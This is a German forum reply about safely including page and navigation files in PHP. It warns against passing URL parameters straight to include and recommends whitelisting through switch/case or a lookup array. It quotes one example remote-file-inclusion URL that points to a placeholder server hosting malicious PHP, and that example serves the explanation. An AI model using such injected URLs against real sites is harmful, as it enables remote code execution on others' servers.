Bobby: Navigationsdatei laden

Beitrag lesen

Hi

Was könnte denn da passieren, wenn ich damit lediglich include ???

Damit ist es möglich, ohne ausreichende Schutzmechanismen, eine externe Datei in die Seite zu includieren. ich könnte z.B. www.irgendeinedomain.de?seite=http://www.irgendeinserver.de/irgendeine_schaedliche_php_datei.php ausführen!!!!!

case "seite1":
include ("asdfasdf.dfcghn");
include ("asdfasdfa.asdf");
etc. pp.
break;

case ist auch ok. Ist beides machbar. Mit mehrdimensionalen Array würde es ungefähr so aussehen:

$dateien = array(
"info1"=>array("inhalt"=>"info1.inc.php",
               "navigation"=>"navigationsdatei"),
"info2"=>array("inhalt"=>"info2.inc.php",
               "navigation"=>navigationsdatei),
.
.
.
usw
)

Augerufen wird dann:
$dateien['info1']['inhalt'] //variable für den Ihnalt 1.Seite
$dateien['info1']['navigation'] //Variable für die Navigation 1.seite
$dateien['info2']['inhalt'] //variable für den Ihnalt 2.Seite
$dateien['info2']['navigation'] //Variable für die Navigation 2.seite

Gruß Bobby